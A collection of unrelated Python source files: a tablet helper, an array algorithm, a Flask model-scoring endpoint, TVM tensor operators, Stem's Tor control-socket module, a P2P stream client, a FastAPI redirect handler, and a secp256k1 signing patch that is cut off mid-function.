self._tablet = tablet_proxy
def set_background(self,color):
self._tablet.setBackgroundColor(color)
def set_image(self,url):
self._tablet.showImage(url)
def load_image(self,url):
return self._table.preLoadImage(url)
|
class Solution:
"""
@param nums: An array of integers
@return: An integer
"""
def maxProduct(self, nums):
n = len(nums)
if n == 0:
return 0
preMin = preMax = nums[0]
minProd = maxProd = nums[0]
largest = nums[0]
for i in range(1, n):
maxProd = max(nums[i], preMin * nums[i], preMax * nums[i])
minProd = min(nums[i], preMin * nums[i], preMax * nums[i])
largest = max(largest, maxProd)
preMax = maxProd
preMin = minProd
return largest |
###################################
# Overview
#
# Script to expose endpoints
###################################
import flask
from flask import request, jsonify
from scoring_functions import prediction_function
from joblib import load
clf = load('models/random_forest_model.joblib')
app = flask.Flask(__name__)
# app.config["DEBUG"] = True # Get hints from web page if it endpoint fails.
# os.chdir('S:/Python/projects/aws_docker_py/python_files')
# http://127.0.0.1:5000/scoreHere?json_input=[[0.0, 0.0]]
@app.route('/scoreHere', methods=['GET'])
def calc_scores():
temp = request.args['json_input']
out = prediction_function(json_input = temp, skmodel = clf)
return jsonify(out)
app.run(host = "0.0.0.0", port = 5000) |
import tvm
def gemm(A, B, transposeA=False, transposeB=False):
"""Matrix multiplies matrix
Args:
-----------------------------
A: tvm.te.tensor.Tensor
shape [height, width]
B: tvm.te.tensor.Tensor
shape [width, length]
transposeA: (optional:False) bool
transposeB: (optional:False) bool
-----------------------------
Returns:
-----------------------------
tvm.te.tensor.Tensor
shape [height, length]
-----------------------------
"""
if transposeA and transposeB:
k = tvm.te.reduce_axis((0, B.shape[1]))
assert (A.shape[0].value == B.shape[1].value)
return tvm.te.compute((A.shape[1], B.shape[0]), lambda i, j: tvm.te.sum(A[k, i] * B[j, k], axis=k))
elif transposeA and not transposeB:
k = tvm.te.reduce_axis((0, B.shape[0]))
assert (A.shape[0].value == B.shape[0].value)
return tvm.te.compute((A.shape[1], B.shape[1]), lambda i, j: tvm.te.sum(A[k, i] * B[k, j], axis=k))
elif not transposeA and transposeB:
k = tvm.te.reduce_axis((0, B.shape[1]))
assert (A.shape[1].value == B.shape[1].value)
return tvm.te.compute((A.shape[0], B.shape[0]), lambda i, j: tvm.te.sum(A[i, k] * B[j, k], axis=k))
else:
k = tvm.te.reduce_axis((0, B.shape[0]))
assert (A.shape[1].value == B.shape[0].value)
return tvm.te.compute((A.shape[0], B.shape[1]), lambda i, j: tvm.te.sum(A[i, k] * B[k, j], axis=k))
def zero_pad2d(inputs, padding=0):
"""Zero padding for 2d tensor
Args:
-----------------------------
inputs : tvm.te.tensor.Tensor
shape [batch, channel, height, width]
padding: (optional:0) int or tuple
expected: (h_pad_up, h_pad_down, w_pad_up, w_pad_down)
-----------------------------
Returns:
-----------------------------
tvm.te.tensor.Tensor
shape [batch, channel, padded_height, padded_width]
-----------------------------
"""
padding = (padding, padding, padding, padding) if isinstance(padding, (int, tvm.tir.IntImm)) else padding
assert isinstance(padding, tuple)
if len(padding) == 2:
padding = (padding[0], padding[0], padding[1], padding[1])
assert (len(padding) == 4)
padding_zero = 0.0 if "float" in inputs.dtype else 0
batch_size, in_channel, height, width = inputs.shape
return tvm.te.compute(
(batch_size, in_channel, height + padding[0] + padding[1], width + padding[2] + padding[3]),
lambda b, c, h, w: tvm.te.if_then_else(
tvm.te.all(h >= padding[0], h < height + padding[0], w >= padding[2], w < width + padding[2]),
inputs[b, c, h - padding[0], w - padding[2]],
padding_zero
),
name='Padding'
)
def conv2d_nchw(inputs, weight, bias=None, stride=1, padding=0, dilation=1, groups=1):
"""Convolution 2d NCHW layout
Args:
-----------------------------
inputs : tvm.te.tensor.Tensor
shape [batch, channel, height, width]
weight : tvm.te.tensor.Tensor
shape [out_channel, channel // groups, kernel_height, kernel_width]
bias : (optional:None) tvm.te.tensor.Tensor
shape [out_channel]
stride : (optional:1) int or tuple
padding : (optional:0) int or tuple
dilation: (optional:1) int
groups : (optional:1) int
-----------------------------
Returns:
-----------------------------
tvm.te.tensor.Tensor
shape [batch, out_channel, output_height, output_width]
-----------------------------
"""
batch_size, in_channel, in_h, in_w = inputs.shape
out_channel, channel_per_group, k_h, k_w = weight.shape
assert ((channel_per_group * groups).value == in_channel.value)
out_channel_per_group = out_channel // groups
assert ((out_channel_per_group * groups).value == out_channel.value)
stride = (stride, stride) if isinstance(stride, (int, tvm.tir.IntImm)) else stride
padding = (padding, padding) if isinstance(padding, (int, tvm.tir.IntImm)) else padding
dilation = (dilation, dilation) if isinstance(dilation, (int, tvm.tir.IntImm)) else dilation
assert (isinstance(stride, tuple) and len(stride) == 2)
assert (isinstance(padding, tuple) and len(padding) == 2)
assert (isinstance(dilation, tuple) and len(dilation) == 2)
out_h = (in_h + 2 * padding[0] - dilation[0] * (k_h - 1) - 1) // stride[0] + 1
out_w = (in_w + 2 * padding[1] - dilation[1] * (k_w - 1) - 1) // stride[1] + 1
rc = tvm.te.reduce_axis((0, channel_per_group), name="rc")
rh = tvm.te.reduce_axis((0, k_h), name="rh")
rw = tvm.te.reduce_axis((0, k_w), name="rw")
padded = zero_pad2d(inputs, padding=padding)
output = tvm.te.compute(
(batch_size, out_channel, out_h, out_w),
lambda b, c, h, w: tvm.te.sum(
(padded[b, c // out_channel_per_group * channel_per_group + rc,
h * stride[0] + rh * dilation[0], w * stride[1] + rw * dilation[1]]
* weight[c, rc, rh, rw]),
axis=[rc, rw, rh]
)
)
if bias is not None:
output = tvm.te.compute(
(batch_size, out_channel, out_h, out_w),
lambda b, c, h, w: output[b, c, h, w] + bias[c]
)
return output
def GEMM(M, K, N):
A = tvm.te.placeholder((M, K), name="A")
B = tvm.te.placeholder((K, N), name="B")
C = gemm(A, B)
return [C.op], [A, B, C]
def Conv2d(N, C, H, W, K, k, stride=1, padding=0, dilation=1, groups=1):
A = tvm.te.placeholder((N, C, H, W), name="A")
B = tvm.te.placeholder((K, C, k, k), name="B")
C = conv2d_nchw(A, B, bias=None, stride=stride, padding=padding, dilation=dilation, groups=groups)
return [C.op], [A, B, C] |
# Copyright 2011-2019, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Supports communication with sockets speaking Tor protocols. This
allows us to send messages as basic strings, and receive responses as
:class:`~stem.response.ControlMessage` instances.
**This module only consists of low level components, and is not intended for
users.** See our `tutorials <../tutorials.html>`_ and `Control Module
<control.html>`_ if you're new to Stem and looking to get started.
With that aside, these can still be used for raw socket communication with
Tor...
::
import stem
import stem.connection
import stem.socket
if __name__ == '__main__':
try:
control_socket = stem.socket.ControlPort(port = 9051)
stem.connection.authenticate(control_socket)
except stem.SocketError as exc:
print 'Unable to connect to tor on port 9051: %s' % exc
sys.exit(1)
except stem.connection.AuthenticationFailure as exc:
print 'Unable to authenticate: %s' % exc
sys.exit(1)
print "Issuing 'GETINFO version' query...\\n"
control_socket.send('GETINFO version')
print control_socket.recv()
::
% python example.py
Issuing 'GETINFO version' query...
version=0.2.4.10-alpha-dev (git-8be6058d8f31e578)
OK
**Module Overview:**
::
BaseSocket - Thread safe socket.
|- RelaySocket - Socket for a relay's ORPort.
| |- send - sends a message to the socket
| +- recv - receives a response from the socket
|
|- ControlSocket - Socket wrapper that speaks the tor control protocol.
| |- ControlPort - Control connection via a port.
| |- ControlSocketFile - Control connection via a local file socket.
| |
| |- send - sends a message to the socket
| +- recv - receives a ControlMessage from the socket
|
|- is_alive - reports if the socket is known to be closed
|- is_localhost - returns if the socket is for the local system or not
|- connection_time - timestamp when socket last connected or disconnected
|- connect - connects a new socket
|- close - shuts down the socket
+- __enter__ / __exit__ - manages socket connection
send_message - Writes a message to a control socket.
recv_message - Reads a ControlMessage from a control socket.
send_formatting - Performs the formatting expected from sent messages.
"""
from __future__ import absolute_import
import re
import socket
import ssl
import threading
import time
import stem.prereq
import stem.response
import stem.util.str_tools
from stem.util import log
MESSAGE_PREFIX = re.compile(b'^[a-zA-Z0-9]{3}[-+ ]')
ERROR_MSG = 'Error while receiving a control message (%s): %s'
# lines to limit our trace logging to, you can disable this by setting it to None
TRUNCATE_LOGS = 10
class BaseSocket(object):
"""
Thread safe socket, providing common socket functionality.
"""
def __init__(self):
self._socket, self._socket_file = None, None
self._is_alive = False
self._connection_time = 0.0 # time when we last connected or disconnected
# Tracks sending and receiving separately. This should be safe, and doing
# so prevents deadlock where we block writes because we're waiting to read
# a message that isn't coming.
self._send_lock = threading.RLock()
self._recv_lock = threading.RLock()
def is_alive(self):
"""
Checks if the socket is known to be closed. We won't be aware if it is
until we either use it or have explicitily shut it down.
In practice a socket derived from a port knows about its disconnection
after failing to receive data, whereas socket file derived connections
know after either sending or receiving data.
This means that to have reliable detection for when we're disconnected
you need to continually pull from the socket (which is part of what the
:class:`~stem.control.BaseController` does).
:returns: **bool** that's **True** if our socket is connected and **False**
otherwise
"""
return self._is_alive
def is_localhost(self):
"""
Returns if the connection is for the local system or not.
:returns: **bool** that's **True** if the connection is for the local host
and **False** otherwise
"""
return False
def connection_time(self):
"""
Provides the unix timestamp for when our socket was either connected or
disconnected. That is to say, the time we connected if we're currently
connected and the time we disconnected if we're not connected.
.. versionadded:: 1.3.0
:returns: **float** for when we last connected or disconnected, zero if
we've never connected
"""
return self._connection_time
def connect(self):
"""
Connects to a new socket, closing our previous one if we're already
attached.
:raises: :class:`stem.SocketError` if unable to make a socket
"""
with self._send_lock:
# Closes the socket if we're currently attached to one. Once we're no
# longer alive it'll be safe to acquire the recv lock because recv()
# calls no longer block (raising SocketClosed instead).
if self.is_alive():
self.close()
with self._recv_lock:
self._socket = self._make_socket()
self._socket_file = self._socket.makefile(mode = 'rwb')
self._is_alive = True
self._connection_time = time.time()
# It's possible for this to have a transient failure...
# SocketError: [Errno 4] Interrupted system call
#
# It's safe to retry, so give it another try if it fails.
try:
self._connect()
except stem.SocketError:
self._connect() # single retry
def close(self):
"""
Shuts down the socket. If it's already closed then this is a no-op.
"""
with self._send_lock:
# Function is idempotent with one exception: we notify _close() if this
# is causing our is_alive() state to change.
is_change = self.is_alive()
if self._socket:
# if we haven't yet established a connection then this raises an error
# socket.error: [Errno 107] Transport endpoint is not connected
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
# Suppressing unexpected exceptions from close. For instance, if the
# socket's file has already been closed then with python 2.7 that raises
# with...
# error: [Errno 32] Broken pipe
try:
self._socket.close()
except:
pass
if self._socket_file:
try:
self._socket_file.close()
except:
pass
self._socket = None
self._socket_file = None
self._is_alive = False
self._connection_time = time.time()
if is_change:
self._close()
def _send(self, message, handler):
"""
Send message in a thread safe manner. Handler is expected to be of the form...
::
my_handler(socket, socket_file, message)
"""
with self._send_lock:
try:
if not self.is_alive():
raise stem.SocketClosed()
handler(self._socket, self._socket_file, message)
except stem.SocketClosed:
# if send_message raises a SocketClosed then we should properly shut
# everything down
if self.is_alive():
self.close()
raise
def _recv(self, handler):
"""
Receives a message in a thread safe manner. Handler is expected to be of the form...
::
my_handler(socket, socket_file)
"""
with self._recv_lock:
try:
# makes a temporary reference to the _socket_file because connect()
# and close() may set or unset it
my_socket, my_socket_file = self._socket, self._socket_file
if not my_socket or not my_socket_file:
raise stem.SocketClosed()
return handler(my_socket, my_socket_file)
except stem.SocketClosed:
# If recv_message raises a SocketClosed then we should properly shut
# everything down. However, there's a couple cases where this will
# cause deadlock...
#
# * This SocketClosed was *caused by* a close() call, which is joining
# on our thread.
#
# * A send() call that's currently in flight is about to call close(),
# also attempting to join on us.
#
# To resolve this we make a non-blocking call to acquire the send lock.
# If we get it then great, we can close safely. If not then one of the
# above are in progress and we leave the close to them.
if self.is_alive():
if self._send_lock.acquire(False):
self.close()
self._send_lock.release()
raise
def _get_send_lock(self):
"""
The send lock is useful to classes that interact with us at a deep level
because it's used to lock :func:`stem.socket.ControlSocket.connect` /
:func:`stem.socket.BaseSocket.close`, and by extension our
:func:`stem.socket.BaseSocket.is_alive` state changes.
:returns: **threading.RLock** that governs sending messages to our socket
and state changes
"""
return self._send_lock
def __enter__(self):
return self
def __exit__(self, exit_type, value, traceback):
self.close()
def _connect(self):
"""
Connection callback that can be overwritten by subclasses and wrappers.
"""
pass
def _close(self):
"""
Disconnection callback that can be overwritten by subclasses and wrappers.
"""
pass
def _make_socket(self):
"""
Constructs and connects new socket. This is implemented by subclasses.
:returns: **socket.socket** for our configuration
:raises:
* :class:`stem.SocketError` if unable to make a socket
* **NotImplementedError** if not implemented by a subclass
"""
raise NotImplementedError('Unsupported Operation: this should be implemented by the BaseSocket subclass')
class RelaySocket(BaseSocket):
"""
`Link-level connection
<https://gitweb.torproject.org/torspec.git/tree/tor-spec.txt>`_ to a Tor
relay.
.. versionadded:: 1.7.0
:var str address: address our socket connects to
:var int port: ORPort our socket connects to
"""
def __init__(self, address = '127.0.0.1', port = 9050, connect = True):
"""
RelaySocket constructor.
:param str address: ip address of the relay
:param int port: orport of the relay
:param bool connect: connects to the socket if True, leaves it unconnected otherwise
:raises: :class:`stem.SocketError` if connect is **True** and we're
unable to establish a connection
"""
super(RelaySocket, self).__init__()
self.address = address
self.port = port
if connect:
self.connect()
def send(self, message):
"""
Sends a message to the relay's ORPort.
:param str message: message to be formatted and sent to the socket
:raises:
* :class:`stem.SocketError` if a problem arises in using the socket
* :class:`stem.SocketClosed` if the socket is known to be shut down
"""
self._send(message, lambda s, sf, msg: _write_to_socket(sf, msg))
def recv(self, timeout = None):
"""
Receives a message from the relay.
:param float timeout: maxiumum number of seconds to await a response, this
blocks indefinitely if **None**
:returns: bytes for the message received
:raises:
* :class:`stem.ProtocolError` the content from the socket is malformed
* :class:`stem.SocketClosed` if the socket closes before we receive a complete message
"""
def wrapped_recv(s, sf):
if timeout is None:
return s.recv()
else:
s.setblocking(0)
s.settimeout(timeout)
try:
return s.recv()
except (socket.timeout, ssl.SSLError, ssl.SSLWantReadError):
return None
finally:
s.setblocking(1)
return self._recv(wrapped_recv)
def is_localhost(self):
return self.address == '127.0.0.1'
def _make_socket(self):
try:
relay_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
relay_socket.connect((self.address, self.port))
return ssl.wrap_socket(relay_socket)
except socket.error as exc:
raise stem.SocketError(exc)
class ControlSocket(BaseSocket):
"""
Wrapper for a socket connection that speaks the Tor control protocol. To the
better part this transparently handles the formatting for sending and
receiving complete messages.
Callers should not instantiate this class directly, but rather use subclasses
which are expected to implement the **_make_socket()** method.
"""
def __init__(self):
super(ControlSocket, self).__init__()
def send(self, message):
"""
Formats and sends a message to the control socket. For more information see
the :func:`~stem.socket.send_message` function.
.. deprecated:: 1.7.0
The **raw** argument was unhelpful and be removed. Use
:func:`stem.socket.send_message` if you need this level of control
instead.
:param str message: message to be formatted and sent to the socket
:raises:
* :class:`stem.SocketError` if a problem arises in using the socket
* :class:`stem.SocketClosed` if the socket is known to be shut down
"""
self._send(message, lambda s, sf, msg: send_message(sf, msg))
def recv(self):
"""
Receives a message from the control socket, blocking until we've received
one. For more information see the :func:`~stem.socket.recv_message` function.
:returns: :class:`~stem.response.ControlMessage` for the message received
:raises:
* :class:`stem.ProtocolError` the content from the socket is malformed
* :class:`stem.SocketClosed` if the socket closes before we receive a complete message
"""
return self._recv(lambda s, sf: recv_message(sf))
class ControlPort(ControlSocket):
"""
Control connection to tor. For more information see tor's ControlPort torrc
option.
:var str address: address our socket connects to
:var int port: ControlPort our socket connects to
"""
def __init__(self, address = '127.0.0.1', port = 9051, connect = True):
"""
ControlPort constructor.
:param str address: ip address of the controller
:param int port: port number of the controller
:param bool connect: connects to the socket if True, leaves it unconnected otherwise
:raises: :class:`stem.SocketError` if connect is **True** and we're
unable to establish a connection
"""
super(ControlPort, self).__init__()
self.address = address
self.port = port
if connect:
self.connect()
def get_address(self):
"""
Provides the ip address our socket connects to.
.. deprecated:: 1.7.0
Use the **address** attribute instead.
:returns: str with the ip address of our socket
"""
return self.address
def get_port(self):
"""
Provides the port our socket connects to.
.. deprecated:: 1.7.0
Use the **port** attribute instead.
:returns: int with the port of our socket
"""
return self.port
def is_localhost(self):
return self.address == '127.0.0.1'
def _make_socket(self):
try:
control_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
control_socket.connect((self.address, self.port))
return control_socket
except socket.error as exc:
raise stem.SocketError(exc)
class ControlSocketFile(ControlSocket):
"""
Control connection to tor. For more information see tor's ControlSocket torrc
option.
:var str path: filesystem path of the socket we connect to
"""
def __init__(self, path = '/var/run/tor/control', connect = True):
"""
ControlSocketFile constructor.
:param str socket_path: path where the control socket is located
:param bool connect: connects to the socket if True, leaves it unconnected otherwise
:raises: :class:`stem.SocketError` if connect is **True** and we're
unable to establish a connection
"""
super(ControlSocketFile, self).__init__()
self.path = path
if connect:
self.connect()
def get_socket_path(self):
"""
Provides the path our socket connects to.
.. deprecated:: 1.7.0
Use the **path** attribute instead.
:returns: str with the path for our control socket
"""
return self.path
def is_localhost(self):
return True
def _make_socket(self):
try:
control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
control_socket.connect(self.path)
return control_socket
except socket.error as exc:
raise stem.SocketError(exc)
def send_message(control_file, message, raw = False):
"""
Sends a message to the control socket, adding the expected formatting for
single verses multi-line messages. Neither message type should contain an
ending newline (if so it'll be treated as a multi-line message with a blank
line at the end). If the message doesn't contain a newline then it's sent
as...
::
<message>\\r\\n
and if it does contain newlines then it's split on ``\\n`` and sent as...
::
+<line 1>\\r\\n
<line 2>\\r\\n
<line 3>\\r\\n
.\\r\\n
:param file control_file: file derived from the control socket (see the
socket's makefile() method for more information)
:param str message: message to be sent on the control socket
:param bool raw: leaves the message formatting untouched, passing it to the
socket as-is
:raises:
* :class:`stem.SocketError` if a problem arises in using the socket
* :class:`stem.SocketClosed` if the socket is known to be shut down
"""
if not raw:
message = send_formatting(message)
_write_to_socket(control_file, message)
if log.is_tracing():
log_message = message.replace('\r\n', '\n').rstrip()
msg_div = '\n' if '\n' in log_message else ' '
log.trace('Sent to tor:%s%s' % (msg_div, log_message))
def _write_to_socket(socket_file, message):
try:
socket_file.write(stem.util.str_tools._to_bytes(message))
socket_file.flush()
except socket.error as exc:
log.info('Failed to send: %s' % exc)
# When sending there doesn't seem to be a reliable method for
# distinguishing between failures from a disconnect verses other things.
# Just accounting for known disconnection responses.
if str(exc) == '[Errno 32] Broken pipe':
raise stem.SocketClosed(exc)
else:
raise stem.SocketError(exc)
except AttributeError:
# if the control_file has been closed then flush will receive:
# AttributeError: 'NoneType' object has no attribute 'sendall'
log.info('Failed to send: file has been closed')
raise stem.SocketClosed('file has been closed')
def recv_message(control_file, arrived_at = None):
"""
Pulls from a control socket until we either have a complete message or
encounter a problem.
:param file control_file: file derived from the control socket (see the
socket's makefile() method for more information)
:returns: :class:`~stem.response.ControlMessage` read from the socket
:raises:
* :class:`stem.ProtocolError` the content from the socket is malformed
* :class:`stem.SocketClosed` if the socket closes before we receive
a complete message
"""
parsed_content, raw_content, first_line = None, None, True
while True:
try:
line = control_file.readline()
except AttributeError:
# if the control_file has been closed then we will receive:
# AttributeError: 'NoneType' object has no attribute 'recv'
log.info(ERROR_MSG % ('SocketClosed', 'socket file has been closed'))
raise stem.SocketClosed('socket file has been closed')
except (socket.error, ValueError) as exc:
# When disconnected we get...
#
# Python 2:
# socket.error: [Errno 107] Transport endpoint is not connected
#
# Python 3:
# ValueError: I/O operation on closed file.
log.info(ERROR_MSG % ('SocketClosed', 'received exception "%s"' % exc))
raise stem.SocketClosed(exc)
# Parses the tor control lines. These are of the form...
# <status code><divider><content>\r\n
if not line:
# if the socket is disconnected then the readline() method will provide
# empty content
log.info(ERROR_MSG % ('SocketClosed', 'empty socket content'))
raise stem.SocketClosed('Received empty socket content.')
elif not MESSAGE_PREFIX.match(line):
log.info(ERROR_MSG % ('ProtocolError', 'malformed status code/divider, "%s"' % log.escape(line)))
raise stem.ProtocolError('Badly formatted reply line: beginning is malformed')
elif not line.endswith(b'\r\n'):
log.info(ERROR_MSG % ('ProtocolError', 'no CRLF linebreak, "%s"' % log.escape(line)))
raise stem.ProtocolError('All lines should end with CRLF')
status_code, divider, content = line[:3], line[3:4], line[4:-2] # strip CRLF off content
if stem.prereq.is_python_3():
status_code = stem.util.str_tools._to_unicode(status_code)
divider = stem.util.str_tools._to_unicode(divider)
# Most controller responses are single lines, in which case we don't need
# so much overhead.
if first_line:
if divider == ' ':
_log_trace(line)
return stem.response.ControlMessage([(status_code, divider, content)], line, arrived_at = arrived_at)
else:
parsed_content, raw_content, first_line = [], bytearray(), False
raw_content += line
if divider == '-':
# mid-reply line, keep pulling for more content
parsed_content.append((status_code, divider, content))
elif divider == ' ':
# end of the message, return the message
parsed_content.append((status_code, divider, content))
_log_trace(bytes(raw_content))
return stem.response.ControlMessage(parsed_content, bytes(raw_content), arrived_at = arrived_at)
elif divider == '+':
# data entry, all of the following lines belong to the content until we
# get a line with just a period
content_block = bytearray(content)
while True:
try:
line = control_file.readline()
raw_content += line
except socket.error as exc:
log.info(ERROR_MSG % ('SocketClosed', 'received an exception while mid-way through a data reply (exception: "%s", read content: "%s")' % (exc, log.escape(bytes(raw_content)))))
raise stem.SocketClosed(exc)
if not line.endswith(b'\r\n'):
log.info(ERROR_MSG % ('ProtocolError', 'CRLF linebreaks missing from a data reply, "%s"' % log.escape(bytes(raw_content))))
raise stem.ProtocolError('All lines should end with CRLF')
elif line == b'.\r\n':
break # data block termination
line = line[:-2] # strips off the CRLF
# lines starting with a period are escaped by a second period (as per
# section 2.4 of the control-spec)
if line.startswith(b'..'):
line = line[1:]
content_block += b'\n' + line
# joins the content using a newline rather than CRLF separator (more
# conventional for multi-line string content outside the windows world)
parsed_content.append((status_code, divider, bytes(content_block)))
else:
# this should never be reached due to the prefix regex, but might as well
# be safe...
log.warn(ERROR_MSG % ('ProtocolError', "\"%s\" isn't a recognized divider type" % divider))
raise stem.ProtocolError("Unrecognized divider type '%s': %s" % (divider, stem.util.str_tools._to_unicode(line)))
def send_formatting(message):
"""
Performs the formatting expected from sent control messages. For more
information see the :func:`~stem.socket.send_message` function.
:param str message: message to be formatted
:returns: **str** of the message wrapped by the formatting expected from
controllers
"""
# From control-spec section 2.2...
# Command = Keyword OptArguments CRLF / "+" Keyword OptArguments CRLF CmdData
# Keyword = 1*ALPHA
# OptArguments = [ SP *(SP / VCHAR) ]
#
# A command is either a single line containing a Keyword and arguments, or a
# multiline command whose initial keyword begins with +, and whose data
# section ends with a single "." on a line of its own.
# if we already have \r\n entries then standardize on \n to start with
message = message.replace('\r\n', '\n')
if '\n' in message:
return '+%s\r\n.\r\n' % message.replace('\n', '\r\n')
else:
return message + '\r\n'
def _log_trace(response):
if not log.is_tracing():
return
log_message = stem.util.str_tools._to_unicode(response.replace(b'\r\n', b'\n').rstrip())
log_message_lines = log_message.split('\n')
if TRUNCATE_LOGS and len(log_message_lines) > TRUNCATE_LOGS:
log_message = '\n'.join(log_message_lines[:TRUNCATE_LOGS] + ['... %i more lines...' % (len(log_message_lines) - TRUNCATE_LOGS)])
if len(log_message_lines) > 2:
log.trace('Received from tor:\n%s' % log_message)
else:
log.trace('Received from tor: %s' % log_message.replace('\n', '\\n'))
|
# -*- coding: utf-8 -*-
# Copyright 2012 Loris Corazza, Sakis Christakidis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from p2ner.abstract.stream import Stream
from p2ner.core.components import loadComponent
from messages.serverstarted import ServerStartedMessage, StartRemoteMessage
from messages.serverstopped import ServerStoppedMessage
defaultScheduler = ("PullClient", [], {})
defaultOverlay = ("CentralClient", [], {})
class StreamClient(Stream):
def initStream(self, *args, **kwargs): #stream, scheduler=defaultScheduler, overlay=defaultOverlay,producer=False):
self.producing=False
self.running=False
self.log=self.logger.getLoggerChild(('c'+str(self.stream.id)),self.interface)
self.log.info('new stream')
self.log.info('%s',self.stream)
self.sanityCheck(["trafficPipe", "controlPipe", "output"])
c,a,k=defaultOverlay
if self.stream.overlay:
c=self.stream.overlay['component']
self.log.debug('trying to load %s',c)
self.overlay = loadComponent("overlay", c)(_parent=self, *a,**k)
c,a,k=defaultScheduler
if self.stream.scheduler:
c=self.stream.scheduler['component']
self.log.debug('trying to load %s',c)
self.scheduler = loadComponent("scheduler", c)(_parent=self,* a,**k)
self.trafficPipe.registerProducer(self.scheduler)
self.registerMessages()
def registerMessages(self):
self.messages = []
self.messages.append(ServerStartedMessage())
self.messages.append(ServerStoppedMessage())
def startRemoteProducer(self):
self.log.debug('sending startRemote message to %s',self.server)
StartRemoteMessage.send(self.stream.id,self.server,self.controlPipe)
def start(self):
if not self.running:
self.log.info('stream is starting')
self.stream.live=True
self.interface.setLiveStream(self.stream.id,True)
self.running=True
for c in ["output", "scheduler"]:
self.log.debug('trying to start %s',c)
self[c].start()
def stop(self):
if True:#self.running:
self.log.info('should stop stream')
d=self['overlay'].stop()
d.addCallback(self._stop)
return d
def _stop(self,res):
self.log.info('stream is stopping')
self.running=False
self.stream.live=False
self.interface.setLiveStream(self.stream.id,False)
self.trafficPipe.unregisterProducer(self.scheduler)
for c in ["output", "scheduler"]:
self.log.debug('trying to stop %s',c)
self[c].stop()
self.log.info('removing stream')
self.root.delStream(self.stream.id)
for c in ["output", "scheduler",'overlay']:
self[c].purgeNS()
self.purgeNS()
|
from fastapi import Request, Response
from fastapi.responses import RedirectResponse
from fps.hooks import register_exception_handler
from fps.logging import get_configured_logger
logger = get_configured_logger("helloworld")
class RedirectException(Exception):
def __init__(self, reason, redirect_to):
self.reason = reason
self.redirect_to = redirect_to
async def exception_handler(request: Request, exc: RedirectException) -> Response:
logger.warning(f"'{exc.reason}' caused redirection to '{exc.redirect_to}'")
return RedirectResponse(url=exc.redirect_to)
h = register_exception_handler(RedirectException, exception_handler)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# -*- mode: python3 -*-
# taken (with minor modifications) from pycoin
# https://github.com/richardkiss/pycoin/blob/01b1787ed902df23f99a55deb00d8cd076a906fe/pycoin/ecdsa/native/secp256k1.py
import os
import sys
import traceback
import ecdsa
from ctypes import (byref, c_size_t, create_string_buffer)
from .util import print_error, print_msg
from . import secp256k1
class _patched_functions:
prepared_to_patch = False
monkey_patching_active = False
def _prepare_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1():
if not secp256k1.secp256k1:
return
# save original functions so that we can undo patching (needed for tests)
_patched_functions.orig_sign = staticmethod(ecdsa.ecdsa.Private_key.sign)
_patched_functions.orig_verify = staticmethod(ecdsa.ecdsa.Public_key.verifies)
_patched_functions.orig_mul = staticmethod(ecdsa.ellipticcurve.Point.__mul__)
curve_secp256k1 = ecdsa.ecdsa.curve_secp256k1
curve_order = ecdsa.curves.SECP256k1.order
point_at_infinity = ecdsa.ellipticcurve.INFINITY
def mul(self: ecdsa.ellipticcurve.Point, other: int):
if self.curve() != curve_secp256k1:
# this operation is not on the secp256k1 curve; use original implementation
return _patched_functions.orig_mul(self, other)
other %= curve_order
if self == point_at_infinity or other == 0:
return point_at_infinity
pubkey = create_string_buffer(64)
public_pair_bytes = b'\4' + self.x().to_bytes(32, byteorder="big") + self.y().to_bytes(32, byteorder="big")
r = secp256k1.secp256k1.secp256k1_ec_pubkey_parse(
secp256k1.secp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
if not r:
return False
r = secp256k1.secp256k1.secp256k1_ec_pubkey_tweak_mul(secp256k1.secp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
if not r:
return point_at_infinity
pubkey_serialized = create_string_buffer(65)
pubkey_size = c_size_t(65)
secp256k1.secp256k1.secp256k1_ec_pubkey_serialize(
secp256k1.secp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, secp256k1.SECP256K1_EC_UNCOMPRESSED)
x = int.from_bytes(pubkey_serialized[1:33], byteorder="big")
y = int.from_bytes(pubkey_serialized[33:], byteorder="big")
return ecdsa.ellipticcurve.Point(curve_secp256k1, x, y, curve_order)
def sign(self: ecdsa.ecdsa.Private_key, hash: int, random_k: int):
# note: random_k is ignored
if self.public_key.curve != curve_secp256k1:
# this operation is not on the secp256k1 curve; use original implementation
return _patched_functions.orig_sign(self, hash, random_k)
secret_exponent = self.secret_multiplier
nonce_function = None
sig = create_string_buffer(64)
sig_hash_bytes = hash.to_bytes(32, byteorder="big")
secp256k1.secp256k1.secp256k1_ecdsa_sign(
secp256k1.secp256k1.ctx, sig, sig_hash_bytes, secret_exponent.to_bytes(32, byteorder="big"), nonce_function, None)
compact_signature = create_string_buffer(64)
secp256k1.secp256k1.secp256k1_ecdsa_signature_serialize_compact(secp256k1.secp256k1.ctx, compact_signature, sig)
r = int.from_bytes(compact_signature[:32], byteorder="big")
s = int.from_bytes(compact_signature[32:], byteorder="big")
return ecdsa.ecdsa.Signature(r, s)
def verify(self: ecdsa.ecdsa.Public_key, hash: int, signature: ecdsa.ecdsa.Signature):
if self.curve != curve_secp256k1:
# this operation is not on the secp256k1 curve; use original implementation
return _patched_functions.orig_verify(self, hash, signature)
sig = create_string_buffer(64)
input64 = signature.r.to_bytes(32, byteorder="big") + signature.s.to_bytes(32, byteorder="big")
r = secp256k1.secp256k1.secp256k1_ecdsa_signature_parse_compact(secp256k1.secp256k1.ctx, sig, input64)
if not r:
return False
r = secp256k1.secp256k1.secp256k1_ecdsa_signature_normalize(secp256k1.secp256k1.ctx, sig, sig)
public_pair_bytes = b'\4' + self.point.x().to_bytes(32, byteorder="big") + self.point.y().to_bytes(32, byteorder="big")
pubkey = create_string_buffer(64)
